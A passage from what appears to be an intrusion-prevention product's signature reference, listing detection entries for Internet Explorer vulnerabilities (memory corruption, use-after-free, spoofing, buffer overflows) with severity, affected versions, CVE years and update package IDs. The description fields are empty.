About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, MS2015-02, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-628-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-8967
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0018

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2015-02, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-628-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0018
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0036

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-02, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-628-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0036
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0046

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-02, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-628-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-0046
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-1634

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-03, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-633-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-1634
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2401

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-07, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2401
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2404

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-07, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2404
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2406

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-07, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2406
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2408

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-07, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2408
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2422

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-07, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2422
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2425

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2015-07, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2425
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2492

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-09, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-679-5211
Last changed: sgpkg-ips-679-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-2492
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-6083

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2015-12, CVE2015, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-740-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-6083
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-6160

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer Detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2015-12, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-711-5211
Last changed: sgpkg-ips-711-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2015-6160
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2016-0108

About this situation: Detected an attempt to exploit a vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2016-03, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-741-5211
Last changed: sgpkg-ips-741-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2016-0108
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4080

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows 7, Windows 2008 R2, Windows 8, Windows RT, Windows 2012, Windows 2008, Windows RT 8.1, Windows 8.1, Windows 2012 R2, Any Hardware, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-09, CVE2014, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4080
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4081

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 8, Windows RT, Windows 2012, Windows 2008, Windows RT 8.1, Windows 8.1, Windows 2012 R2, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-09, CVE2014, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4081
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4086

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows XP SP2, Windows Vista, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2014-09, CVE2014, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1286-5242
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4086
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4088

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows XP SP2, Windows Vista, Windows 7, Windows 2008 R2, Windows 8, Windows RT, Windows 2012, Windows 2008, Windows RT 8.1, Windows 8.1, Windows 2012 R2, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-09, CVE2014, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4088
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4089

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows XP SP2, Windows Vista, Windows 7, Windows 8, Windows 2012, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-09, CVE2014, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1286-5242
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4089
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4092-1

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows XP SP2, Windows Vista, Windows 7, Windows 8, Windows 2012, Windows 2008, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-09, CVE2014, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4092
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4092-2

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows XP SP2, Windows Vista, Windows 7, Windows 8, Windows 2012, Windows 2008, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-09, CVE2014, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4092
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4094

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows XP SP2, Windows Vista, Windows 7, Windows 8, Windows 2012, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-09, CVE2014, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4094
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4095

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows 7, Windows 8, Windows 2012, Windows 2008, Any Hardware, Internet Explorer 11.0, MS2014-09, CVE2014, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4095
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-MHTML-URI-Buffer-Overflow

About this situation: Detects MHTML URI buffer overflow exploits against Internet Explorer
Context: Text File Stream
Severity: 2
Tags: Windows, x86, Internet Explorer, MS2006-08, CVE2006, Windows not specific, Internet Explorer not specific, Potential Denial of Service
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTTP-Microsoft-Internet-Explorer-MHTML-URI-Buffer-Overflow
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-MHTML-Url-Processing-Vulnerability

About this situation: A malicious MHTML protocol URI detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 5.5, MS2004, CVE2004, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTTP-Microsoft-Internet-Explorer-MHTML-Url-Processing-Vulnerability
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Mismatched-DOM-Objects-Memory-Corruption

About this situation: Attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 5.5, MS2005-12, CVE2005, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-Mismatched-DOM-Objects-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Mouse-Movement-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Internet Explorer, Any Operating System not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Microsoft-Internet-Explorer-Mouse-Movement-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-msxml3-Concurrency-Vulnerability

About this situation: An attempt to exploit memory corruption vulnerability in Microsoft Internet Explorer was detected
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer, MS2008-11, CVE2007, Windows not specific, Internet Explorer not specific, Potential Denial of Service
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-msxml3-Concurrency-Vulnerability
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Multiple-Event-Handler-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 6.0, MS2006-04, CVE2006, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-586-5211
Vulnerability: Microsoft-Internet-Explorer-Multiple-Event-Handler-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Multiple-Events-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2012-06, CVE2012, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-681-5211
Last changed: sgpkg-ips-681-5211
Vulnerability: Microsoft-Internet-Explorer-Multiple-Events-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Null-Byte-CVE-2012-0012

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, MS2012-02, CVE2012, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-720-5211
Vulnerability: Microsoft-Internet-Explorer-Null-Byte-CVE-2012-0012
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Null-Byte-CVE-2012-1873

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2012-06, CVE2012, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-457-5211
Last changed: sgpkg-ips-457-5211
Vulnerability: Microsoft-Internet-Explorer-Null-Byte-CVE-2012-1873
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Null-Byte-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, MS2012-02, CVE2012, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-826-5242
Vulnerability: Microsoft-Internet-Explorer-Null-Byte-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Object-Management-CVE-2011-1345

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-04, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-Object-Management-CVE-2011-1345
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Object-Reference-Count-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2007-12, CVE2007, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-Object-Reference-Counting-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Object-Tag-Slash-Buffer-Overflow

About this situation: Buffer overflow in Internet Explorer allows remote compromise
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer, MS2003, CVE2003, Windows not specific, Internet Explorer not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-587-5211
Vulnerability: Ie-Object-Type-Property-BOF
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Objects-Handling-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2008-08, CVE2008, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-586-5211
Vulnerability: Microsoft-Internet-Explorer-Objects-Handling-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-OnMove-Use-After-Free-CVE-2012-1529

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2012-09, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-480-5211
Last changed: sgpkg-ips-480-5211
Vulnerability: Microsoft-Internet-Explorer-OnMove-Use-After-Free-CVE-2012-1529
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Onpropertychange-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 10.0, MS2013-10, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-547-5211
Last changed: sgpkg-ips-547-5211
Vulnerability: Microsoft-Internet-Explorer-Onpropertychange-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-onreadystatechange-CVE-2012-0170

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2012-04, CVE2012, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-1202-5242
Vulnerability: Microsoft-Internet-Explorer-onreadystatechange-CVE-2012-0170
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-onreadystatechange-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, Internet Explorer 9.0, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-722-5211
Vulnerability: Microsoft-Internet-Explorer-onreadystatechange-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-onreadystatechange-Use-After-Free-CVE-2010-0491

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2010-03, CVE2010, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-722-5211
Vulnerability: Microsoft-Internet-Explorer-onreadystatechange-Use-After-Free-CVE-2010-0491
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-onUnload-Event-Memory-Corruption

About this situation: Attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 2
Tags: Windows, x86, Internet Explorer, CVE2007, Windows not specific, Internet Explorer not specific, Potential Denial of Service
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTTP_Microsoft-Internet-Explorer-onUnload-Event-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Out-Of-Bounds-Vulnerability-CVE-2018-0996

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2018-04, CVE2018, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-Out-Of-Bounds-Vulnerability-CVE-2018-0996
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-outerHTML-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 6.0, MS2006-08, CVE2006, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-586-5211
Vulnerability: Microsoft-Internet-Explorer-outerHTML-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Plugin-Loading-Address-Bar-Spoofing

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2006-06, CVE2006, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Internet-Explorer-Plugin-Loading-Address-Bar-Spoofing
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Popup-Title-Bar-Spoofing

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 6.0, CVE2005, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Internet-Explorer-Popup-Title-Bar-Spoofing
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Print-Preview-Handling-Command-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2008-08, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-Print-Preview-Handling-Command-Execution
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Race-Condition-CVE-2011-1257

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer, MS2011-08, CVE2011, Windows not specific, Internet Explorer not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-Race-Condition-CVE-2011-1257
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Runtimestyle-Handling-Memory-Corruption

About this situation: An attempt to exploit vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows 7, Windows 8, Windows 2012, Windows 2008, Any Hardware, Internet Explorer 10.0, MS2013-10, CVE2013, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Microsoft-Internet-Explorer-Runtimestyle-Handling-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Same-Id-Property-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, MS2012-06, CVE2012, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Vulnerability: Microsoft-Internet-Explorer-Same-Id-Property-Use-After-Free
Description:
Back to top

